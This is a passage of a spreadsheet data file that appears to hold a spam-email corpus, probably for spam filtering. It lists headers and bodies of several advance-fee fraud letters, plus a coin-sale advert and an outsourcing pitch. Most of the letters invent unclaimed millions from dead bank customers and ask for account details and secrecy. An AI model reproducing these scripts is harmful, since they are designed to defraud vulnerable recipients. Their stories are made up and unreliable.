one \nof our foreign customer who died along with his entire family in (Monday \n31st July 2000) in a plane crash. Since we got information about his death, \nwe have been expecting his next of kin to come over and claim his money \nbecause we cannot release it unless somebody applies for it as next of kin \nor relati on to the deceased as indica ted in our banking guidelines, but \nunfortunately we learnt that all his supposed next of kin or relation died \nalongside with him at the plane crash leaving nobody behind for the claim. \nIt is therefore upon this discovery that I and one official in my department \nnow decided to make this businness proposal to you and release the money to \nyou as the next of kin or relation to the deceased for safety and subsequent \ndisbursement since nobody is coming for it and we dont want this money to \ngo into the bank treasury as unclaimed bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after five years, the money will be transfered into the Bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner, and a \nBurkinabe cannot stand as next of kin to a foreigner. We agree that 30 % of \nthis money will be for you as foreign partner, in respect to the provision \nof a foreign account, 10 % will be set aside for expenses incured during the \nbusiness and 60 % would be for me and my woman colleague. There after i will \nvisit your country for disbursement according to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as arranged, \nyou must apply first to the bank as relations or next of kin of the deceased \nindicating your bank name, your bank account number, your private telephone \nand fax number for easy and effective communication and location where the \nmoney will be remitted.Upon receipt of your reply, I will send to you by fax \nor email the text of the application I will not fail to bring to your notice \nthat this transaction is hitch free and that you should not entertain any \natom of fear as all required arrangements have been made for thetransfer.\n\nYou should contact me on my number 00226-7885 75 97 immediately as soon as \nyou receive this letter. Trusting to hear from you immediately.\n\nYours faithfully,\n\nGodwin Amiri  (Esq.)\nFROM (ADB) OUAGADOUGOU BURKINA-FASO.\nGOD BLESSINGS,PROTECTIONS AND GUIDIANCE TO YOUR ENTIRE FAMILY.\n\nPOST SCRITUM:You have to keep everything secret as to enable the transfer to \nmove very\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.msn.fr</t>
  </si>
  <si>
    <t>957</t>
  </si>
  <si>
    <t>To: sifj@UM\nFrom: mkuti@sify.com\nDate: Wed, 27 Oct 2004 04:05:22 +0200</t>
  </si>
  <si>
    <t>Wed, 27 Oct 2004 04:05:22 +0200</t>
  </si>
  <si>
    <t>mkuti@sify.com</t>
  </si>
  <si>
    <t>sifj@UM</t>
  </si>
  <si>
    <t>URGENT                           cooybphcr</t>
  </si>
  <si>
    <t>\n\n\n\nMIKE KUTI\nEmail. mkuti@sify.com\n\nI am Mr. Miku Kuti, a staff of a reputable bank in Johannesburg, Gauteng Province in the Republic of South\nAfrica. I have an urgent and very confidential business proposition for you. We had a foreign client named Mr. Wooin Shim, who\ndeposited a huge sum of money (12.5 Million United States Dollars), with our bank.\n\nEventually, this client died in a plane crash and since his death we have not had anybody come up for the\nclaims as the next of kin.\n\nYou may want to take a look at other passangers who were on the same plane, here is a site for your perusal.\n\n[URL]http://www.cnn.com[/URL]\n\nA situation I have monitored closely with my position in the bank. Now having monitored this deposit and\nmanaged it over the years before his death, and hence nobody has showed up as the next of kin for the past\nyears. I now solicit for your assistance to present you as the next of kin as every other arrangement has been\nconcluded by me and my partners involved. I am only waiting for a foreigner to enable us move the funds to his or her\naccount. This does not have any risk attached to it, as we have\nour contacts in various departments of the bank that will handle all the internal documentations.I therefore request you to confirm your interest by a\nreturn message through my email and I will furnish you with details and more information.\nBest regards\nMIKE KUTI\n\n_________________________________________________\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com</t>
  </si>
  <si>
    <t>5785</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: "Cristina" &lt;cristina@collectorsinternet.com&gt;\nDate: Wed, 27 Nov 2002 22:18:53 -0800</t>
  </si>
  <si>
    <t>Wed, 27 Nov 2002 22:18:53 -0800</t>
  </si>
  <si>
    <t>"Cristina" &lt;cristina@collectorsinternet.com&gt;</t>
  </si>
  <si>
    <t>Thanksgiving Sale</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0070_01C29634.08C7C1D0 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We want to thank you for your past business and wish you and yours a = very Happy Thanksgiving Holiday this year.  As you know, Indians played = an important role in helping the pioneers find food and water.  No small = wonder they were honored on our nation's cents from 1859 to 1909 and = gold coins from 1854 to 1933.   As a way of giving thanks to our = customers, we just bought in a rare batch of 900 VF and XF Indian Cents = and are offering these on special for this week.  Nice mixture of dates = from the 1880s to 1909.   Our regular wholesale price for solid VF coins = is $1.95 and $6.00 for solid XF. For this week only, we are offering 10 different dates, VF or better, = for only $15 or 10 Different dates, solid XF or better, for only $45.  = Dealers/Investors - Buy a nice roll of 50, with at least 10 different = dates in each roll.  VF roll of 50, only $69.  XF roll of 50, only $195. =  Limit: 5 rolls of each per customer at these low wholesale prices.    =20 We also have some really nice Choice BU (MS 63 or better)  $21/2 Indian = Gold coins from 1908-1929 for only $395 each (our choice of date, but we = will pick out the best quality) 3 different for only $950 or 10 = different for $2,950.  Limit: 10 per customer. =20 Please add $6 to help with postage and insurance on all orders. =20 Thank you again, Cristina [URL]www.collectorsinternet.com[/URL] P.S. One of our most popular items this month has been our wholesale=20 bargain boxes, found half way down our homepage or at=20 [URL]http://collectorsinternet.com[/URL]  We are getting = many=20 repeat orders from other dealers.  You can save time and postage by = adding=20 this item, or any other items we have on sale to your other purchases, = as=20 there is only a $6 postage and handling fee per order, regardless of = size.=20 ------=_NextPart_000_0070_01C29634.08C7C1D0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We want to thank you for your past = business and=20 wish you and yours a very Happy Thanksgiving Holiday this year.  As = you=20 know, Indians played an important role in helping the pioneers find food = and=20 water.  No small wonder they were honored on our nation's cents = from 1859=20 to 1909 and gold coins from 1854 to 1933.   As a way of = giving=20 thanks to our customers, we just bought in a rare batch of 900 VF = and XF=20 Indian Cents and are offering these on special for this week.  Nice = mixture=20 of dates from the 1880s to 1909.   Our regular wholesale price = for=20 solid VF coins is $1.95 and $6.00 for solid XF. For this week only, we are offering 10 = different=20 dates, VF or better, for only $15 or 10 Different dates, solid XF = or=20 better, for only $45.  Dealers/Investors - Buy a nice roll of 50, with at least 10 = different=20 dates in each roll.  VF roll of 50, only $69.  XF roll of 50, = only=20 $195.  Limit: 5 rolls of each per customer at these low = wholesale=20 prices.      We also have some really = nice Choice BU (MS 63=20 or better)  $21/2 Indian Gold coins from 1908-1929 for only = $395 each=20 (our choice of date, but we will pick out the best quality) 3 different = for only=20 $950 or 10 different for $2,950.  Limit: 10 per = customer. =20 Please add $6 to help with postage and = insurance on=20 all orders.     Thank you again, Cristina [URL]www.collectorsinternet.com[/URL] P.S. One of our most popular items this = month has=20 been our wholesale bargain boxes, found half way down our homepage = or at=20 [URL]http://collectorsinternet.com[/URL] .  We are getting many repeat = orders from other=20 dealers.  You can save time and postage by adding this item, or = any=20 other items we have on sale to your other purchases, as there is = only a $6=20 postage and handling fee per order, regardless of size.=20             ------=_NextPart_000_0070_01C29634.08C7C1D0--</t>
  </si>
  <si>
    <t>www.collectorsinternet.com http://collectorsinternet.com www.collectorsinternet.com http://collectorsinternet.com</t>
  </si>
  <si>
    <t>3166</t>
  </si>
  <si>
    <t>To: nan\nFrom: DR AHMED SHALAA &lt;drahmed_sh14@hotmail.com&gt;\nDate: Wed, 27 Jun 2007 16:31:06 +0000</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2007 16:31:06 +0000</t>
  </si>
  <si>
    <t>DR AHMED SHALAA &lt;drahmed_sh14@hotmail.com&gt;</t>
  </si>
  <si>
    <t>I am waiting to receive your mail</t>
  </si>
  <si>
    <t>\nDR AHMED SHALAA.BANK OF AFRICA OUAGADOUGOU,BURKINA FASO. Dear friend, RE: TRANSFER OF ($8,500.000.00 USD EIGHT MILLION FIVE HUNDRED THOUSAND DOLLARS)I want to transfer to overseas the sum of ($8.500.000.00USD) Eight Million Five Hundred Thousand United States Dollars) from a Prime Bank in Africa. I would like to ask you to quietly look for a reliable and honest person who will be capable and fit to provide either an existing bank account or to set up a new Bank a/c immediately to receive this money, even an empty  a/c can serve as far as it can receive money. I am DR AHMED SHALAA. an accountant and personal confidant to Mr.Robert Rice who died together with his wife in a plane crash on the October 31st 1999 on their way to attendwedding in Boston, he is an American, a physician andindustrialist, he died without having anybeneficiary to his assets including his account here in Burkina Faso which he opened as his personal savings for the purpose of expansion and developement of his company before his untimely death in 1999. The amount involved is ($8.500.000.00USD) Eight Million Five Hundred Thousand United States Dollars), no other person knows about this account. I am contacting you for us to transfer this funds to your account as the beneficiary, I want to transfer the whole $8,500.000.00 (Eight Million Five Hundred Thousand USD)  into a safe account abroad, but I don't know any foreigner. I am only contacting you as a foreigner because this money can not be approved to a local person here, without valid international foreign passport, but can only be approved to any foreigner with valid international passport or drivers license and foreign a/c because the money is in US Dollars and the former owner of the a/c Mr.Robert Rice is aforeigner too, and as such the money can only be approved into a foreign a/c. I need your full co-operation to make this work fine because the management is ready to approve this payment to any foreigner who has correct information of this account, which I will give to you, upon your positive response and once I am convinced that you are capable and will meet up with the inheritance procedures. At the conclusion of this business, you will be given 40% of the total amount,55% will be for me, while 5% will be for expenses both parties might have incurred during the process of transferring. You should observe utmost CONFIDENTIALITY AND SECRECY in this transaction, and rest assured that this transaction would be most profitable for both of us because I will require your assistance to invest my share in your country. Sincerely,Dr.Ahmed Shalaa.\n_________________________________________________________________\nWith Windows Live Hotmail, you can personalize your inbox with your favorite color.\n[URL]www.windowslive-hotmail.com[/URL]</t>
  </si>
  <si>
    <t>www.windowslive-hotmail.com</t>
  </si>
  <si>
    <t>3164</t>
  </si>
  <si>
    <t>To: nan\nFrom: richard bongo &lt;richard_bongo112za@hotmail.com&gt;\nDate: Wed, 27 Jun 2007 15:49:57 +0200</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2007 15:49:57 +0200</t>
  </si>
  <si>
    <t>richard bongo &lt;richard_bongo112za@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Mr Richard Bongo</t>
  </si>
  <si>
    <t>\nAfrican Development Bank GroupMokova Towers, Suite 068Braamfointeen, Johannesburg, South Africa.(P.O.Box 1155, 2000 Johannesburg)Contact email :(richardbongo1000@hotmail.com)Tel:27 78 516 3013                                                                            CONFIDENTIALDear Confidant,This may not be a proper way of disclosing a matter of such importance to you. But please bear with me as what I have may be of interest to you. It is a business proposal that will benefit both of us.My name is Mr Richard Bongo, living in South Africa and I am 47 years old. I have been working with Africa Development Bank for quite a number of years now, as the Chief Operation Officer to the Private Banking Service Department.My aim of contacting you is to solicit your sincere co-operation and assistance based on a financial portfolio of (21.5Million United States Dollars), placed under my supervision for investment purpose since 5 year ago .But presently the said Money is lying dormant in a Vault firm in Europe due to the sudden death of the original owner who left nobody as next of kin to claim this Funds. And as the Head of the Private Banking Sector as well as his Financial Adviser, I am the only person left with final details concerning his deposit.I am willing to provide you with full information on how we can move these funds legally to an account opened in your name if you agree to assist and co-operate with me. I will also provide you with more personal details of myself and this transaction on your response to this mail.Please treat this matter as confidential, urgent and utmost importance. Onlyrespond through my private Email: (richardbongo1000@hotmail.com)Thanks,Mr Richard Bongo\n_________________________________________________________________\nExplore the seven wonders of the world\n[URL]http://search.msn.com[/URL]</t>
  </si>
  <si>
    <t>http://search.msn.com</t>
  </si>
  <si>
    <t>3163</t>
  </si>
  <si>
    <t>To: nan\nFrom: richard bongo &lt;richard_bongo112za@hotmail.com&gt;\nDate: Wed, 27 Jun 2007 15:49:47 +0200</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2007 15:49:47 +0200</t>
  </si>
  <si>
    <t>\nAfrican Development Bank GroupMokova Towers, Suite 068Braamfointeen, Johannesburg, South Africa.(P.O.Box 1155, 2000 Johannesburg)Contact email :(richardbongo1000@hotmail.com)Tel:27 78 516 3013                                                                            CONFIDENTIALDear Confidant,This may not be a proper way of disclosing a matter of such importance to you. But please bear with me as what I have may be of interest to you. It is a business proposal that will benefit both of us.My name is Mr Richard Bongo, living in South Africa and I am 47 years old. I have been working with Africa Development Bank for quite a number of years now, as the Chief Operation Officer to the Private Banking Service Department.My aim of contacting you is to solicit your sincere co-operation and assistance based on a financial portfolio of (21.5Million United States Dollars), placed under my supervision for investment purpose since 5 year ago .But presently the said Money is lying dormant in a Vault firm in Europe due to the sudden death of the original owner who left nobody as next of kin to claim this Funds. And as the Head of the Private Banking Sector as well as his Financial Adviser, I am the only person left with final details concerning his deposit.I am willing to provide you with full information on how we can move these funds legally to an account opened in your name if you agree to assist and co-operate with me. I will also provide you with more personal details of myself and this transaction on your response to this mail.Please treat this matter as confidential, urgent and utmost importance. Onlyrespond through my private Email: (richardbongo1000@hotmail.com)Thanks,Mr Richard Bongo\n_________________________________________________________________\nInvite your mail contacts to join your friends list with Windows Live Spaces. It's easy!\n[URL]http://spaces.live.com[/URL]</t>
  </si>
  <si>
    <t>http://spaces.live.com</t>
  </si>
  <si>
    <t>3165</t>
  </si>
  <si>
    <t>To: nan\nFrom: Koutaba jean &lt;koutab0025@hotmail.com&gt;\nDate: Wed, 27 Jun 2007 15:40:45 +0000</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2007 15:40:45 +0000</t>
  </si>
  <si>
    <t>Koutaba jean &lt;koutab0025@hotmail.com&gt;</t>
  </si>
  <si>
    <t>GREETINGS FROM KOUTABA  JEAN</t>
  </si>
  <si>
    <t>\nMr. Koutaba Jean.The Account / Audit Manager,Banque De Habitat Au Burkina Faso(BHBF).Ouagadougou Burkina Faso.Dear Beloved,I presumed that all is well with you and your family. Please let this do not be a surprise proposal to you because i got your contact information from the international directory in few weeks ago before i decided to contact you on this magintude and lucrative transaction for our future survival in life. Moreover, i have laid all the solemn trust in you beforei decided to disclose this successful &amp; confidential transaction to you.As the Account / Audit Manager of our bank, i have decided to contact you over this financial transaction worth the sum of DOLLARS($5.500,000.00 ) for our success.This is an abandoned sum that belongs to one of our bank foreign customers who died along with his entire family through plane crash disaster since few years ago.Meanwhile i was very fortune to came across the deceased file when i was arranging the old and abandoned customers files in other to sign and submit to the entire bank management for an official re-documentation and audit of the year against 2007.Be informed clearly that it was stated in our banking rules and regulations which was signed lawfully that if such fund remains unclaimed till the period of 4 years started from the date when the beneficiary died, the money will be transferred into the treasury as an unclaimed fund.As a honour and advantage bestowed to our foreign customers base on the rules guideing our bank, it was stated obviously that if you are not a Burkina Faso citizen, you have the absolute authority to claim the fund despite your differences from the country of origin of the deceased. So the request of you as a foreigner is necessary to apply for the claim and transfer of the fund smoothly into your reliable bank account as theNEXT OF KIN to the deceased.PERCENTAGE RATIO: note that 35% being will be your share in respect of your assistance and account provide for the tranfer, 55% will be my share being the pioneer of the business while the rest 10% will be used to install a joint company in your country which will bear our name in particular and whatever profit made out from this company will be used in helping the less privileges, mothrless babies home and charity organization in the world.If you are really sure of your trustworthy, accountability and confidentiality on his transaction, contact me and agree that you will not change your mind to cheat or disappoint me when the fund have getting into your account. Besides you should not entertain any fear because i am sure of the success as an insider in the bank ok.Please reply with the assurance, include your private telephone and fax numbers necessary for effective and easy communication in this transaction.As soon as you reply i will let you know the next step to follow in order to finalize this transaction immediately. I expect your urgent communication.Yours sincerely,Mr.Koutaba Jean.\n_________________________________________________________________\nMake every IM count. Download Windows Live Messenger and join the i’m Initiative now. It’s free. \n[URL]http://im.live.com[/URL]</t>
  </si>
  <si>
    <t>http://im.live.com</t>
  </si>
  <si>
    <t>3161</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr. Gamudi Mboma &lt;gmboma2@hotmail.com&gt;\nDate: Wed, 27 Jun 2007 08:04:56 +0100</t>
  </si>
  <si>
    <t>Wed, 27 Jun 2007 08:04:56 +0100</t>
  </si>
  <si>
    <t>Mr. Gamudi Mboma &lt;gmboma2@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT</t>
  </si>
  <si>
    <t>\nFROM Mr. Gamudi MbomaP.O.BOX 3038,57 VICTORIA STREET, LONDON SW1H, UNITED KINGDOM  I NEED YOUR ASSISTANCE; Greeting from Mr.Gamudi Mboma, the  Chief Auditor with NATWEST BANK PLC, here in london LONDON-UK.One of our accounts, with holding balance of £12.500 000,000 (Twelve Million Five Hundred thousand pounds Sterling) has been dormant and last operated for years ago. From my investigations, the owner of the said account,Is a foreigner by name MR. JOHN SHUMEJDA who died along with his entire family in crash at Birmingham Airport  on 4th Jan, 2002. View this website for verification[URL]http://www.cwn.org.uk[/URL] Since then, nobody has done anything as regards the claiming of this money, as he has no family member that has any knowledge as to the existence of either the account or the funds; I have confidently discussed this issue with some of the bank officials and we have agreed to find a reliable foreign partner to assit me.  My proposition to you, is to seek your consent to present you as the Next of kin and beneficiary of this late client, So that the proceeds of this account valued a huge sum shall be paid to you, and then we can share the amount on a mutually agreed percentage of 30% for you,While 60% for me and others involved, 10% shall be used for miscelenious expenses while the  remainder shall be given to a reputable charity home because the money is owned  by a deceased person.  I will be released to you after necessary processes have been  followed. Let me hear from you as soon as you get this message, so we can proceed.  Best regards,Mboma\n_________________________________________________________________\nMake every IM count. Download Windows Live Messenger and join the i’m Initiative now. It’s free. \n[URL]http://im.live.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cwn.org.uk http://im.live.com</t>
  </si>
  <si>
    <t>1425</t>
  </si>
  <si>
    <t>To: nan\nFrom: WAKUH OTU &lt;drotu@xuno.com&gt;\nDate: Wed, 27 Jul 2005 17:30:11 +0100</t>
  </si>
  <si>
    <t>Wed, 27 Jul 2005 17:30:11 +0100</t>
  </si>
  <si>
    <t>WAKUH OTU &lt;drotu@xuno.com&gt;</t>
  </si>
  <si>
    <t>PLEASE UPDATE ME</t>
  </si>
  <si>
    <t>&gt;From The Desk Of Dr. Otu Wakuh \n\n\nMay God be with you. \n\nI am Dr.Otu Wakuh Working in department of Fund Release Order Burkina \nFaso , I know this letter might come to you as surprise,but take it \nlike your own deal. \n\nEngr. Siawosh Romo from Iran executed contract through Federal \nMinistry of Works &amp; Housing here in Burkina Faso, the contract worth \nof (US$17.5M) but on the process of transferring the money to him,he \ndied with his family in earthquake disaster that occurred recently in \nIran([URL]http://news.bbc.co.uk[/URL] \n\nMeanwhile, his money has been asigned to be paid through my office \nbefore I will give order to the final endorsement of his money. \nNobody knows what is going on except I and one of colleagues, late \nEngr.Romo's information will be furnished to you base on your \nwillingness. \n\nYou will have to act as the beneficiary of this fund, Since I have \nbeen unsuccesfull in locating the the relatives now, I seek your \nconsent to present you as the next of kin of the deceased so that the \nUS$17.5M Dollars can be paid into your account so that you and I can \nshare the money according to the agreed ratio. \n\nI will send to you the whole relevant information that required in \nthis transaction immediately you accept to co-operate with me.\nSend to me your:\n1. Your privates phone and fax\n2. Name of your company if any to enable us to start the deal \nimmediately,I have decided to give you 30% of this money and 5% for \nHomeless in Iran while 5 % will be for motherless babies here. \n\nThis is 100% risk-free. \n\nMeanwhile,I will be going to my retirement very soon, so need this \nmoney to take care of my family in future am waiting your urgent \nreply. Contact me via my confidential Email: wakuhotu@yyhmail.com \n\nGod blesses you. \n\nYours truly, \n\nDr.Otu Wakuh \n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1426</t>
  </si>
  <si>
    <t>To: R@M\nFrom: tony hill &lt;tony_yuhill8@hotmail.com&gt;\nDate: Wed, 27 Jul 2005 13:06:10 +0200</t>
  </si>
  <si>
    <t>Wed, 27 Jul 2005 13:06:10 +0200</t>
  </si>
  <si>
    <t>tony hill &lt;tony_yuhill8@hotmail.com&gt;</t>
  </si>
  <si>
    <t>R@M</t>
  </si>
  <si>
    <t>VERY URGENT</t>
  </si>
  <si>
    <t>\nFROM:MR.TONY HILL.\nTel: + 874-763-591-425\nFax: + 874-763-591-426\n\nRE: TRANSFER OF US$48.223 MILLION {FORTY EIGHT MILLION  TWO HUNDRED &amp; TWENTY \nTHREE THOUSAND U.S DOLLARS  ONLY TO YOUR ACCOUNT}\n\nAttn:\n\nI feel quite safe dealing with you in this important business having gone \nthrough your remarkable profile on the internet. Though, this medium \n(Internet) has been greatly abused, I choose to reach you through it because \nit still remains the fastest medium of communication. However, this \ncorrespondence is unofficial and private, and it should be treated as such.\n\nAt first I will like to assure you that this transaction is 100% risk and \ntrouble free to both parties.\n\nMy name is MR TONY HILL I work as the operational manager in account \nmanagement section in charge of credit and foreign bills of one of the prime \nbanks here in South Africa. On a routine inspection I discovered a dormant \ndomiciliary account with a Balance Of US$48,223,000. 00 (Forty eight million \ntwo hundred and twenty three thousand U.S dollar).On further discreet \ninvestigation, I also discovered that the account holder has died long ago \nwith his family on a fatal Auto-accident leaving no beneficiary to the  \naccount and no other person knows about this account.\n\nI am in close contact with the manager of the bank here who is my partner \nand he is willing to approve the transfer to any reliable and trustworthy  \nforeigner with foreign bank account because the former operator of the a/c \nis a foreigner and from Australia in particular. I am certainly sure that he \nhas no writen or oral WILL attached to the account , no  beneficiary and \nnobody will come again for the claim of this money. It is only a foreigner \nwho can claim this money with legal claims to the account holder  which I \nwill provide to you if you are interested, therefore I need your cooperation \nin this transaction. The difference in country of origins is not a hindrance \nto the success of this transaction. This money will remain useless in this \ndormant account if I did not transfer the fund out to a foreign account.\n\nI will provide the necessary information and documents needed in order to \nclaim this money. I only need your cooperation as a foreigner to provide \nyour safe bank account information for the transfer. All arrangement  that \nwill ensure a smooth transfer of the fund to the account which you are to \nnominate is already in place.You should also provide me with your direct  \nphone lines for easy communication. I wish for utmost confidentiality in \nhandling this transaction.\n\nAt the conclussion of this transaction, your share will be 25% of the total \ntransfer sum, 70% for me and my partner while 5% will be set aside for any  \nexpenses both parties might incure during the process of the transfer. The \nfund will be transferred to your account in two parts. I will first transfer \nUSD 20 Million to your account. I will fly over to meet you  after the \nsuccessful transfer for sharing according to the agreed percentages. I will  \nhave the remaining balance of USD28,223 Million transferred to your account \nonly after the successful sharing of the first transfer without any \ndisappointment from your side.\n\nI am looking forward to have a reply from you through my E-mail or you can \ncall me or fax me.If you want to call my No. dial the way you use to call \nother countries, do not put South African area code which is 27, because it \nis a satellite phone which I bourght for this transaction for the security \nreason because our local land line here is not secured.\n\n\nLet me hear from you.\nBest Regards,\nMR.TONY HILL\n\n_________________________________________________________________\nSearch &amp; browse smarter, faster - download MSN Search Toolbar today, it's \nFREE! [URL]http://toolbar.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://toolbar.msn.co.za</t>
  </si>
  <si>
    <t>1427</t>
  </si>
  <si>
    <t>To: risa_russia_2@sify.com\nFrom: MRS.LARISA NITSKAYAA &lt;risa_russia_2@sify.com&gt;\nDate: Wed, 27 Jul 2005 12:32:35 -0700</t>
  </si>
  <si>
    <t>Wed, 27 Jul 2005 12:32:35 -0700</t>
  </si>
  <si>
    <t>MRS.LARISA NITSKAYAA &lt;risa_russia_2@sify.com&gt;</t>
  </si>
  <si>
    <t>risa_russia_2@sify.com</t>
  </si>
  <si>
    <t>MRS.LARISA NITSKAYAA</t>
  </si>
  <si>
    <t>DEAR FRIEND,\nMY NAME IS MRS.LARISA NITSKAYAA,PERSONAL SECRETARY TO MR.BORIS MIKHAIL\nKHODORKOVSKY,THE ARRESTED CHAIRMAN/CEO OF YUKOS OIL AND BANK MENATEP\nSPB IN RUSSIA.\n\nI HAVE THE DOCUMENTS OF A LARGE AMOUNT OF FUNDS WHICH HE HANDED OVER TO\nME BEFORE HE WAS DETAINED AND NOW BEEN TRIED IN RUSSIA FOR FINANCING\nPOLITICAL PARTIES(the Union of Right Forces,led by Boris Nemtsov, and\nYabloko, a liberal/social democratic party led by Gregor Yavlinsky)\nOPPOSED TO THE GOVERNMENT OF MR.VLADMIR PUTIN,THE PRESIDENT THEREBY\nLEADING TO THE FREEZING OF HIS FINANCES AND ASSETS.AFTER SEARCHING\nTHROUGH THE\nBOOKS OF YOUR COUNTRY'S CHAMBERS OF COMMERCE AND INDUSTRIES HERE IN\nRUSSIA I AM CONTACTING YOU TO ASSIST ME TO RE-PROFILE THE FUNDS AND\nEQUALLY INVEST SAME ON HIS BEHALF.\n\nTHE TOTAL AMOUNT OF FUNDS TO BE RE-PROFILLED IS HUGE.AS SOON AS I RECEIVE YOUR\nACCEPTANCE,I WILL SEND YOU THE NECESSARY DETAILS AND MY IDENTIFICATION.\n\nYOURS SINCERELY,\nMRS.LARISA NITSKAYAA\nNB:YOU CAN READ MORE OF HIS ORDEAL FROM:\n\n[URL]http://newsfromrussia.com[/URL]\n[URL]http://www.interfax.ru[/URL]\n[URL]http://www.supportmbk.com[/URL]\n[URL]http://www.nationmaster.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://newsfromrussia.com http://www.interfax.ru http://www.supportmbk.com http://www.nationmaster.com</t>
  </si>
  <si>
    <t>1420</t>
  </si>
  <si>
    <t>To: karen.sparck-jones@cl.cam.ac.uk\nFrom: Juliet Johnson &lt;juliet_johnson001@email.ro&gt;\nDate: Wed, 27 Jul 2005 04:29:19 +0300</t>
  </si>
  <si>
    <t>Wed, 27 Jul 2005 04:29:19 +0300</t>
  </si>
  <si>
    <t>Juliet Johnson &lt;juliet_johnson001@email.ro&gt;</t>
  </si>
  <si>
    <t>karen.sparck-jones@cl.cam.ac.uk</t>
  </si>
  <si>
    <t>Urgent Respond</t>
  </si>
  <si>
    <t>\n\n   Dear Sir/Madam\n\nI made up my mind with trust to contact you for an\nurgent and very confidential business, knowing fully\nwell that this letter may come to you as a surprise.\nI'm MISS Juliet johnson, Controller International\nUnit(Operations)Global Trust Bank London. I'm a native\nof Switzerland, but based here in London. In the\ncourse of our Last Annual Account's check, I\ndiscovered that a customer Mr. Michael Hammond made a\nFixed Deposit valued at �4,800,000.00(Four Million\nEight Hundred Thousand Pounds).In my further\ninvestigation,I discovered that he died on 6th\nSeptember 2003 without making a WILL, did not also\ndeclare any Next of Kin or relations in all his\nofficial documents, including his Bank Deposit\ndocuments in this Bank. This sum of �4,800,000.00 is\nstill in this Bank,no one has ever come forward to\nclaim it. \n\nMy proposal is that I will like you to stand in as the\nNext of Kin to Late Mr. Michael Hammond so that we can\nclaim this funds. This is very simple as long I?m here\nto direct and provide you with every information\nrequired for this transaction.This Funds will be paid\nto you, for us to shared, the expences that will occur in\nthis transaction will be taking of, if it will cost me much to settle my asisstant and others i dont mind,just to make sure  this money didn't enter Banks account.  No risk involved in  this transaction as my position guarantees the successful execution of this transaction. Feel free to reply me\nback with my private email adress ,if you are interested. to claim this funds as Next Of Kin to Late Mr Michael Hammond, it is upon your response that I shall then provide you with more details and relevant information that will help us to go about this transaction. All I want from you is honesty and trust worthiness. Please observe utmost confidentiality, and be rest assured that this transaction would be most profitable for all of us.\n \nCONTACT ME WITH THIS PRIVATELY \n            juli_johnson001@yahoo.com\n\nRegards. Miss. juliet johnson  \n \n97 Cromwell Road London,SW4DN U.K\n\n______________________________________________\n[URL]http://www.sentimente.ro[/URL]\nSingur? Peste 180.000 utilizatori pentru tine!\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.sentimente.ro</t>
  </si>
  <si>
    <t>ROU</t>
  </si>
  <si>
    <t>4704</t>
  </si>
  <si>
    <t>To: &lt;webmaster@taint.org&gt;\nFrom: Oksana Svetlova &lt;oksana@antee.com&gt;\nDate: Wed, 27 Feb 2002 06:34:18 +0400</t>
  </si>
  <si>
    <t>Wed, 27 Feb 2002 06:34:18 +0400</t>
  </si>
  <si>
    <t>Oksana Svetlova &lt;oksana@antee.com&gt;</t>
  </si>
  <si>
    <t>&lt;webmaster@taint.org&gt;</t>
  </si>
  <si>
    <t>Proposal for cooperation</t>
  </si>
  <si>
    <t>Hello. I meant to contact [URL]http://taint.org[/URL] webmaster,\nAm I correct, I hope?\n\nActually, I am not quite sure... Did I or Natasha Fedorova write \nyou before to your other address? Anyway, now I am here instead of \nher too.\n\nSo, my name is Oksana Svetlova, I live in St. Petersburg, Russia.\n\nI have an idea, how we could cooperate to mutual benefit, see, \npossibly you will find it interesting.\n\nPeople are seeking to cut costs with this economy slow-down, right?\n\nThe thing is that I could get you in touch with developers from\nRussia, who will be happy to do a web designer's work for you for\nconsiderably less, than you possibly take from your clients (or \npay for web-design?), and with _professional_ quality. Also - all\nprogramming, Internet-programming, graphic, flash design, content\nwriting, translations, etc. If you do web-design, then you may\naccept more orders at once, getting a good share from each, and\ndevote yourself only to that work, you find most interesting.\nAlternatively, you can realize more your ideas to develop, more\nfeatures to add to your existing sites, and with low costs: from\n$12, and an average of $18 an hour.\n\nI have put links to their works at [URL]www.antee.com[/URL]\n\nAs for reliability, I just saw, how carefully they hand-picked their\nspecialists, and under what tight management they do their projects.\nSo, from past experience, it was almost always possible to meet \ndeadlines. Also, communication is properly thought-out: a consultant \nis online in ICQ and other instant messengers almost each day, also \ntheir company has local consultants in many states throughout the \nUSA, in Europe and Australia.\n\nSo, what do you think? A possibility for cooperation?\n\nThank you very much,\nOksana Svetlova.\noksana@antee.com\n\nPS. Just in case you need any type of IT works now, please let me \nknow a bit of details, they will return you a cost/time estimation.</t>
  </si>
  <si>
    <t>http://taint.org www.antee.com</t>
  </si>
  <si>
    <t>326</t>
  </si>
  <si>
    <t>To: jerrypeter2@freesurf.fr\nFrom: jerrypeter2@freesurf.fr\nDate: Wed, 27 Aug 2003 13:47:10 +0200</t>
  </si>
  <si>
    <t>Wed, 27 Aug 2003 13:47:10 +0200</t>
  </si>
  <si>
    <t>jerrypeter2@freesurf.fr</t>
  </si>
  <si>
    <t>CONFIDENTIAL</t>
  </si>
  <si>
